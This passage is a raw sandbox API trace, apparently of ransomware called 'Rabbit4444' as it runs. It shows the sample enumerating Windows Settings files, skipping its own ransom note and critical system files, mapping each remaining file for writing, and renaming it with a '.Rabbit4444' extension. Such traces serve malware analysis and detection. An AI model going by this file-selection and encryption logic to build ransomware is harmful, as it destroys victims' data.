lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupSpeechMicrophone.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupspeechmicrophone.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.455] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5fddcab, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf5fddcab, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23a287a5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", cAlternateFileName="AA18E7~1.SET")) returned 1 [0056.455] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.455] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.455] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.455] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", lpString2=".") returned 1 [0056.455] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", lpString2="..") returned 1 [0056.455] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", lpString2="windows") returned -1 [0056.455] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.455] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.455] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", lpString2="boot") returned -1 [0056.455] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.455] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.455] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms" | out: lpString1="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms") returned="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms" [0056.455] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.455] lstrlenW (lpString="AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms") returned 53 [0056.455] lstrlenW (lpString="Rabbit4444") returned 10 [0056.456] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.456] lstrlenW (lpString=".dll") returned 4 [0056.456] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.456] lstrlenW (lpString=".lnk") returned 4 [0056.456] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.456] lstrlenW (lpString=".ini") returned 4 [0056.456] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.456] lstrlenW (lpString=".sys") returned 4 [0056.456] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.456] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupspeechtexttospeech.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.456] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.456] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14776680710) returned 1 [0056.456] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1147) returned 1 [0056.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.456] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0056.456] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0056.457] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0056.458] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.458] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.458] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.458] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.458] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.459] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14776949744) returned 1 [0056.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0056.459] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0056.459] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.459] CloseHandle (hObject=0x298) returned 1 [0056.459] CloseHandle (hObject=0x278) returned 1 [0056.459] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms.Rabbit4444") returned 181 [0056.459] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupspeechtexttospeech.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupspeechtexttospeech.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.460] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf62b2906, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf62b2906, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x238d127e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x472, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", cAlternateFileName="AA8C6B~1.SET")) returned 1 [0056.460] lstrcmpiW (lpString1="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.460] lstrcmpiW (lpString1="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.460] lstrcmpiW (lpString1="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.460] lstrcmpiW (lpString1="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", lpString2=".") returned 1 [0056.460] lstrcmpiW (lpString1="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", lpString2="..") returned 1 [0056.460] lstrcmpiW (lpString1="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", lpString2="windows") returned -1 [0056.460] lstrcmpiW (lpString1="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.460] lstrcmpiW (lpString1="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.460] lstrcmpiW (lpString1="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", lpString2="boot") returned -1 [0056.460] lstrcmpiW (lpString1="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.460] lstrcmpiW (lpString1="AAA_SettingsGroupVirtualDesktops.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.460] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupVirtualDesktops.settingcontent-ms" | out: lpString1="AAA_SettingsGroupVirtualDesktops.settingcontent-ms") returned="AAA_SettingsGroupVirtualDesktops.settingcontent-ms" [0056.460] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupVirtualDesktops.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.460] lstrlenW (lpString="AAA_SettingsGroupVirtualDesktops.settingcontent-ms") returned 50 [0056.460] lstrlenW (lpString="Rabbit4444") returned 10 [0056.460] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.460] lstrlenW (lpString=".dll") returned 4 [0056.460] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.460] lstrlenW (lpString=".lnk") returned 4 [0056.460] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.461] lstrlenW (lpString=".ini") returned 4 [0056.461] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.461] lstrlenW (lpString=".sys") returned 4 [0056.461] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.461] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupVirtualDesktops.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupvirtualdesktops.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.461] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.461] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14777163012) returned 1 [0056.461] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1138) returned 1 [0056.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.461] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0056.461] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0056.462] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0056.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.463] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.463] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14777409603) returned 1 [0056.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0056.463] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.464] CloseHandle (hObject=0x298) returned 1 [0056.464] CloseHandle (hObject=0x278) returned 1 [0056.464] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupVirtualDesktops.settingcontent-ms.Rabbit4444") returned 178 [0056.464] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupVirtualDesktops.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupvirtualdesktops.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupVirtualDesktops.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupvirtualdesktops.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.464] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf647c596, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf647c596, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x461, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupYourAccount.settingcontent-ms", cAlternateFileName="AA1C73~1.SET")) returned 1 [0056.464] lstrcmpiW (lpString1="AAA_SettingsGroupYourAccount.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.464] lstrcmpiW (lpString1="AAA_SettingsGroupYourAccount.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.464] lstrcmpiW (lpString1="AAA_SettingsGroupYourAccount.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.464] lstrcmpiW (lpString1="AAA_SettingsGroupYourAccount.settingcontent-ms", lpString2=".") returned 1 [0056.464] lstrcmpiW (lpString1="AAA_SettingsGroupYourAccount.settingcontent-ms", lpString2="..") returned 1 [0056.464] lstrcmpiW (lpString1="AAA_SettingsGroupYourAccount.settingcontent-ms", lpString2="windows") returned -1 [0056.464] lstrcmpiW (lpString1="AAA_SettingsGroupYourAccount.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.464] lstrcmpiW (lpString1="AAA_SettingsGroupYourAccount.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.465] lstrcmpiW (lpString1="AAA_SettingsGroupYourAccount.settingcontent-ms", lpString2="boot") returned -1 [0056.465] lstrcmpiW (lpString1="AAA_SettingsGroupYourAccount.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.465] lstrcmpiW (lpString1="AAA_SettingsGroupYourAccount.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.465] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupYourAccount.settingcontent-ms" | out: lpString1="AAA_SettingsGroupYourAccount.settingcontent-ms") returned="AAA_SettingsGroupYourAccount.settingcontent-ms" [0056.465] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupYourAccount.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.465] lstrlenW (lpString="AAA_SettingsGroupYourAccount.settingcontent-ms") returned 46 [0056.465] lstrlenW (lpString="Rabbit4444") returned 10 [0056.465] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.465] lstrlenW (lpString=".dll") returned 4 [0056.465] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.465] lstrlenW (lpString=".lnk") returned 4 [0056.465] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.465] lstrlenW (lpString=".ini") returned 4 [0056.465] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.465] lstrlenW (lpString=".sys") returned 4 [0056.465] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.465] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupYourAccount.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupyouraccount.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.466] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.466] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14777634244) returned 1 [0056.466] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1121) returned 1 [0056.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0056.466] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0056.466] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x298 [0056.467] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x70000 [0056.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.468] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.468] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14777879214) returned 1 [0056.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0056.468] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0056.468] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.468] CloseHandle (hObject=0x298) returned 1 [0056.468] CloseHandle (hObject=0x278) returned 1 [0056.468] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupYourAccount.settingcontent-ms.Rabbit4444") returned 174 [0056.468] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupYourAccount.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupyouraccount.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupYourAccount.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupyouraccount.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.469] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf65f9d24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf65f9d24, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x435, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageAccountsManage.settingcontent-ms", cAlternateFileName="AAD2AF~1.SET")) returned 1 [0056.469] lstrcmpiW (lpString1="AAA_SettingsPageAccountsManage.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.469] lstrcmpiW (lpString1="AAA_SettingsPageAccountsManage.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.469] lstrcmpiW (lpString1="AAA_SettingsPageAccountsManage.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.469] lstrcmpiW (lpString1="AAA_SettingsPageAccountsManage.settingcontent-ms", lpString2=".") returned 1 [0056.469] lstrcmpiW (lpString1="AAA_SettingsPageAccountsManage.settingcontent-ms", lpString2="..") returned 1 [0056.469] lstrcmpiW (lpString1="AAA_SettingsPageAccountsManage.settingcontent-ms", lpString2="windows") returned -1 [0056.469] lstrcmpiW (lpString1="AAA_SettingsPageAccountsManage.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.469] lstrcmpiW (lpString1="AAA_SettingsPageAccountsManage.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.469] lstrcmpiW (lpString1="AAA_SettingsPageAccountsManage.settingcontent-ms", lpString2="boot") returned -1 [0056.469] lstrcmpiW (lpString1="AAA_SettingsPageAccountsManage.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.469] lstrcmpiW (lpString1="AAA_SettingsPageAccountsManage.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.469] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageAccountsManage.settingcontent-ms" | out: lpString1="AAA_SettingsPageAccountsManage.settingcontent-ms") returned="AAA_SettingsPageAccountsManage.settingcontent-ms" [0056.469] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsManage.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.470] lstrlenW (lpString="AAA_SettingsPageAccountsManage.settingcontent-ms") returned 48 [0056.470] lstrlenW (lpString="Rabbit4444") returned 10 [0056.470] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.470] lstrlenW (lpString=".dll") returned 4 [0056.470] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.470] lstrlenW (lpString=".lnk") returned 4 [0056.470] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.470] lstrlenW (lpString=".ini") returned 4 [0056.470] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.470] lstrlenW (lpString=".sys") returned 4 [0056.470] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.470] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAccountsManage.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageaccountsmanage.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.470] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.470] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14778104873) returned 1 [0056.470] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1077) returned 1 [0056.470] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0056.470] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0056.470] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x740, lpName=0x0) returned 0x298 [0056.472] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x740) returned 0x70000 [0056.473] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.473] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.473] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.473] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) 